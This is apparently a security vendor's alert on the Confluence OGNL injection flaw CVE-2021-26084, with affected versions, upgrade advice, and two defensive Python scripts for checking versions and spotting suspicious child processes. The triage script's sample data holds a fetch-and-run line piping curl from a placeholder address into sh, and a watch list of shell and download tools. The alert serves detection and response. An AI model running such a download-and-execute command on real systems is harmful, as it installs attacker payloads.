Atlassian has issued a security advisory, and U.S. Cyber Command has issued a public warning, regarding an OGNL injection vulnerability that exists in multiple versions of the Confluence Server and Data Center products.
This Remote Code Execution (RCE) vulnerability could allow an authenticated user, and in some cases an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. Exploitation has been observed in the wild, and fixed versions are available. Confluence Cloud customers are not affected.
CVE-2021-26084 – Confluence Server Security Advisory
This vulnerability exists in on-premises Confluence Server and Data Center instances and can be exploited by non-administrator users or, potentially, by unauthenticated users if the "Allow people to sign up to create their account" option is enabled.
To check whether this option is enabled, go to:
Cog (Administration) icon > User management > User Signup Options
Affected versions (on-premises Confluence Server and Data Center):
Before version 6.13.23
From version 6.14.0 before 7.4.11
From version 7.5.0 before 7.11.6
From version 7.12.0 before 7.12.5
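As an added example (not Atlassian's code and not part of the original alert), the following Python encodes the four affected ranges above so that the version string reported by an instance (Administration > General Configuration > System Information) can be checked mechanically. Each range's upper bound is the first fixed release in that branch, which is what the advisory's "before X" wording means; the handling of a "-" qualifier suffix is an assumption for robustness, not something the advisory describes.

```python
"""Check an on-premises Confluence Server / Data Center version against the
CVE-2021-26084 affected ranges listed in this alert.

Added example, not Atlassian's code. Each range is (inclusive lower bound or
None, exclusive upper bound); the upper bound is the first fixed release in
that branch, which is what "before X" in the advisory means.
"""
from typing import Optional, Tuple

Version = Tuple[int, ...]

AFFECTED_RANGES = [
    (None, "6.13.23"),
    ("6.14.0", "7.4.11"),
    ("7.5.0", "7.11.6"),
    ("7.12.0", "7.12.5"),
]


def parse_version(text: str) -> Version:
    """'7.4.10' -> (7, 4, 10); '7.13' -> (7, 13, 0) so short strings compare sanely.

    A qualifier after '-' (assumed form, e.g. '7.4.10-x') is ignored; the advisory
    only lists plain dotted versions.
    """
    core = text.strip().split("-")[0]
    parts = [int(p) for p in core.split(".")]
    if not 1 <= len(parts) <= 3:
        raise ValueError(f"unexpected version string: {text!r}")
    parts += [0] * (3 - len(parts))
    return tuple(parts)


def _matching_range(v: Version) -> Optional[Tuple[Optional[str], str]]:
    """Return the affected range containing v, or None if v is outside all of them."""
    for low, high in AFFECTED_RANGES:
        above_low = low is None or parse_version(low) <= v
        if above_low and v < parse_version(high):
            return low, high
    return None


def is_affected(version: str) -> bool:
    """True if the version falls inside one of the affected ranges."""
    return _matching_range(parse_version(version)) is not None


def fixed_version_for(version: str) -> Optional[str]:
    """First fixed release in the same branch, or None if the version is not affected."""
    rng = _matching_range(parse_version(version))
    return None if rng is None else rng[1]


if __name__ == "__main__":
    for v in ("6.13.22", "6.13.23", "7.4.10", "7.4.11", "7.11.5", "7.12.4", "7.13.0"):
        if is_affected(v):
            status = f"affected, upgrade to {fixed_version_for(v)} or later"
        else:
            status = "not affected"
        print(f"{v:>8}: {status}")
```

Note the boundaries: 6.13.23, 7.4.11, 7.11.6 and 7.12.5 are the first fixed releases and come out as not affected, as does anything at or above 7.13.0, while 6.14.0 (the first version after the 6.13 branch) is affected. Versions in the gaps between ranges, such as 7.4.12, are also not affected.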
Proof-of-concept code has been publicly available since August 31, 2021, and active exploitation has been observed since September 2, 2021.
Atlassian recommends upgrading to the latest Long Term Support release, which is linked in the sources section at the bottom of this Flash Alert along with more information on the fixes.
If upgrading is not possible at this time, Atlassian has provided a temporary workaround in the "Mitigation" section of the Confluence Security Advisory.
If a compromise is suspected, the following should be investigated:
Curl utility – Malicious actors often use curl to download additional payloads onto compromised Linux systems, so look for recent or unexpected curl invocations, particularly any spawned by the Confluence process.
It is also necessary to identify any recent processes launched by the Confluence server application: commands run through the OGNL injection are executed by the Confluence JVM, so they appear as its child processes.
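The two checks above can be combined into one triage pass over a process listing. The Python below is an added example, not Atlassian's or Security On-Demand's code: it parses the output of `ps -eo pid,ppid,user,comm,args` from the suspect host, finds the Confluence JVM, and reports any of its descendants whose command name is a download utility or shell. The embedded listing is constructed for illustration (198.51.100.7 is a documentation address, not a real indicator), the default installation path and the watch list of command names are assumptions, and every hit still needs manual review.

```python
"""Triage a Linux process listing for download utilities and shells spawned by the
Confluence server process.

Added example, not Atlassian's or Security On-Demand's code. It parses the output of
    ps -eo pid,ppid,user,comm,args
and reports descendants of the Confluence JVM whose command name is on a watch list.
The listing below is constructed for illustration (198.51.100.7 is a documentation
address, not a real indicator); the watch list is an assumption, extend it as needed.
"""
from dataclasses import dataclass
from typing import Dict, List

# Commands that are rarely legitimate children of a web application server (assumed list).
WATCH_LIST = {"curl", "wget", "sh", "bash", "dash", "python", "python3", "perl", "nc"}

# Constructed sample: a Confluence JVM, a payload download chain spawned from it, and an
# administrator's unrelated curl under sshd that must not be flagged.
SAMPLE_PS = """\
  PID  PPID USER       COMMAND         COMMAND
    1     0 root       systemd         /sbin/init
 1201     1 confluence java            /opt/atlassian/confluence/jre/bin/java -Dcatalina.base=/opt/atlassian/confluence org.apache.catalina.startup.Bootstrap start
 4410  1201 confluence sh              sh -c curl http://198.51.100.7/x.sh | sh
 4412  4410 confluence curl            curl http://198.51.100.7/x.sh
 4413  4410 confluence sh              sh
 2200     1 root       sshd            /usr/sbin/sshd -D
 2300  2200 root       curl            curl https://updates.example.com/status
"""


@dataclass
class Proc:
    pid: int
    ppid: int
    user: str
    comm: str
    args: str


def parse_ps(listing: str) -> Dict[int, Proc]:
    """Parse `ps -eo pid,ppid,user,comm,args` output into a pid -> Proc map."""
    procs: Dict[int, Proc] = {}
    for line in listing.strip().splitlines()[1:]:  # first line is the header
        fields = line.split(None, 4)  # maxsplit=4 keeps the spaces inside args
        if len(fields) < 5:
            continue
        pid, ppid, user, comm, args = fields
        procs[int(pid)] = Proc(int(pid), int(ppid), user, comm, args)
    return procs


def confluence_pids(procs: Dict[int, Proc]) -> List[int]:
    """Confluence runs inside a Tomcat JVM; identify it by 'java' plus 'confluence' in its command line."""
    return [p.pid for p in procs.values()
            if p.comm == "java" and "confluence" in p.args.lower()]


def descendants(procs: Dict[int, Proc], root: int) -> List[int]:
    """All processes below `root` in the parent/child tree, depth first."""
    found: List[int] = []
    stack = [root]
    while stack:
        parent = stack.pop()
        for p in procs.values():
            if p.ppid == parent:
                found.append(p.pid)
                stack.append(p.pid)
    return found


def suspicious_children(listing: str) -> List[Proc]:
    """Descendants of the Confluence JVM whose command name is on the watch list."""
    procs = parse_ps(listing)
    flagged: List[Proc] = []
    for root in confluence_pids(procs):
        for pid in descendants(procs, root):
            if procs[pid].comm in WATCH_LIST:
                flagged.append(procs[pid])
    return flagged


if __name__ == "__main__":
    for p in suspicious_children(SAMPLE_PS):
        print(f"pid {p.pid} (parent {p.ppid}, user {p.user}): {p.args}")
```

On the sample the whole `sh -c curl ... | sh` chain under the JVM (pids 4410, 4412, 4413) is reported, while the administrator's curl under sshd is not, because it does not descend from the Confluence process. Walking the tree rather than grepping for `curl` alone is what separates the two. Because a payload fetched this way usually exits quickly, run the listing as early as possible and pair it with process accounting or EDR telemetry where available.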
Again, Confluence Cloud customers are not affected.
If your organization operates on-premises Confluence Server or Data Center instances, we request that you provide us with the asset IP address and any other identifying information.
The Security On-Demand Threat Recon Unit will continue to monitor these events and provide relevant updates. SOD is not affected by this vulnerability.
If you have any questions about this alert, please contact your Security On-Demand Customer Success Manager.
Sources:
Atlassian Confluence Security Advisory – OGNL injection vulnerability (CVE-2021-26084)
Confluence Release Notes – Long Term Support release notes and links
Confluence Server and Data Center Download – Long Term Support download center
CVE-2021-26084 – Atlassian issue tracker
MITRE CVE-2021-26084 – Confluence Server and Data Center vulnerability
NIST NVD CVE-2021-26084 – Confluence Server and Data Center vulnerability
CVE-2021-26084 – Rapid7 analysis, triggers and vulnerability checks
Confluence RCE – GitHub write-up and proof of concept